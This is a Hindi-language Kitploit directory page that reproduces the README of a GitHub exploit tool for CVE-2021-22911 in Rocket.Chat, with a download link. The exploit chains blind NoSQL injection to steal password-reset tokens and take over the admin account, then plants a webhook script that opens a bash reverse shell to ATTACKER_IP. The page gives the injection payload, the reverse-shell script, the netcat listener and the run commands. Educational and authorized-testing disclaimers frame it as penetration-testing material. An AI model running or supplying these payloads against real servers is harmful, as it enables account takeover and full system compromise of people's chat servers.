Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
rocketcat-cve-2021-22911-exploit — CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - शैक्षणिक उद्देश्य | Kitploit
उपकरण/GitHubGitHub/roshanrajbanshi/rocketcat-cve-2021-22911-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubroshanrajbanshi/rocketcat-cve-2021-22911-exploit

rocketcat-cve-2021-22911-exploit

CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - शैक्षणिक उद्देश्य

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

Rocket.Chat CVE-2021-22911 एक्सप्लॉइट

⚠️ अस्वीकरण - केवल शैक्षणिक उपयोग

यह एक्सप्लॉइट केवल अधिकृत पैठ परीक्षण (penetration testing) और शैक्षणिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

📋 अवलोकन

CVE-2021-22911 Rocket.Chat में एक गंभीर अनधिकृत NoSQL इंजेक्शन भेद्यता है जो रिमोट कोड निष्पादन (RCE) की ओर ले जाती है।

  • CVSS स्कोर: 9.8 (गंभीर)
  • प्रभावित संस्करण: Rocket.Chat < 3.12.7
  • हमला वेक्टर: नेटवर्क / अनधिकृत
  • प्रभाव: पूर्ण सिस्टम समझौता

🎯 भेद्यता विवरण

यह एक्सप्लॉइट तीन NoSQL इंजेक्शन हमलों को जोड़ता है:

चरण 1: निम्न-विशेषाधिकार उपयोगकर्ता पासवर्ड रीसेट

  • निम्न-विशेषाधिकार उपयोगकर्ता के लिए forgot password अनुरोध भेजता है
  • पासवर्ड रीसेट टोकन को कैरेक्टर-दर-कैरेक्टर निकालने के लिए $regex ऑपरेटर के साथ ब्लाइंड NoSQL इंजेक्शन का उपयोग करता है
  • पासवर्ड को एक ज्ञात मान पर रीसेट करता है

चरण 2: एडमिन पासवर्ड रीसेट

  • चरण 1 को दोहराता है लेकिन एडमिन खाते को लक्षित करता है
  • ब्लाइंड NoSQL इंजेक्शन के माध्यम से एडमिन पासवर्ड रीसेट टोकन निकालता है
  • एडमिन पासवर्ड बदलता है

चरण 3: रिमोट कोड निष्पादन

  • समझौता किए गए एडमिन खाते के रूप में प्रमाणित करता है
  • JavaScript पेलोड के साथ एक वेबहुक इंटीग्रेशन बनाता है
  • पेलोड रिवर्स शेल उत्पन्न करने के लिए Node.js child_process.exec() का उपयोग करता है
  • रिवर्स शेल निष्पादित करने के लिए वेबहुक को ट्रिगर करता है

🛠️ पूर्वापेक्षाएँ

root@kitploit:~
pip install requests

🚀 उपयोग

1. Netcat लिसनर प्रारंभ करें (टर्मिनल 1)

root@kitploit:~
nc -lvnp 4444

2. एक्सप्लॉइट चलाएँ (टर्मिनल 2)

मैन्युअल IP प्रविष्टि:

root@kitploit:~
python3 rocket_chat_exploit.py \
  -u [email protected] \
  -a [email protected] \
  -t http://chat.rocket.thm \
  -i 10.9.0.1 \
  -p 4444

tun0 IP स्वतः-पहचानें (अनुशंसित):

root@kitploit:~
python3 rocket_chat_exploit.py \
  -u [email protected] \
  -a [email protected] \
  -t http://chat.rocket.thm \
  -i $(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1) \
  -p 4444

तर्क (Arguments):

  • -u: निम्न-विशेषाधिकार उपयोगकर्ता ईमेल (मौजूद होना चाहिए)
  • -a: एडमिन ईमेल
  • -t: लक्ष्य URL (Rocket.Chat इंस्टेंस)
  • -i: आपका हमलावर IP (tun0)
  • -p: Netcat लिसनर पोर्ट

उदाहरण आउटपुट

root@kitploit:~
============================================================
  Rocket.Chat CVE-2021-22911 — RCE
  Target : http://chat.rocket.thm
  Shell  : 10.9.0.1:4444
============================================================

[PHASE 1] Low-priv user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
    [43/43] aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Token: aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Password changed to: P@$$w0rd!1234

[PHASE 2] Admin user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
    [43/43] XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Token: XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Password changed to: P@$$w0rd!1234

[PHASE 3] RCE
[!] Start your listener now:  nc -lvnp 4444
[*] Press Enter when nc is ready...
[+] Authenticated as [email protected]
    userid : userid123456789
    token  : token123456...
[+] Webhook created
    http://chat.rocket.thm/hooks/hookid123/token456
[*] Triggering reverse shell...
[+] Trigger sent — check your nc listener

🔍 तकनीकी विवरण

NoSQL इंजेक्शन पेलोड प्रारूप

root@kitploit:~
{
  "message": {
    "msg": "method",
    "method": "getPasswordPolicy",
    "params": [
      {
        "token": {
          "$regex": "^abc"
        }
      }
    ]
  }
}

RCE पेलोड (वेबहुक स्क्रिप्ट)

root@kitploit:~
class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    exec('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"');
  }
}

📚 संदर्भ

  • मूल एक्सप्लॉइट: enox - Exploit-DB 50078, 50108
  • भेद्यता विश्लेषण: SonarSource ब्लॉग
  • CVE विवरण: CVE-2021-22911

📝 श्रेय

  • enox - मूल एक्सप्लॉइट विकास
  • SonarSource - भेद्यता अनुसंधान और विश्लेषण

⚖️ कानूनी नोटिस

यह उपकरण केवल शैक्षणिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA) और समान अंतर्राष्ट्रीय कानूनों के तहत एक आपराधिक अपराध है।


जिम्मेदारी से उपयोग करें। केवल उन्हीं सिस्टम का परीक्षण करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

टूल डाउनलोड करें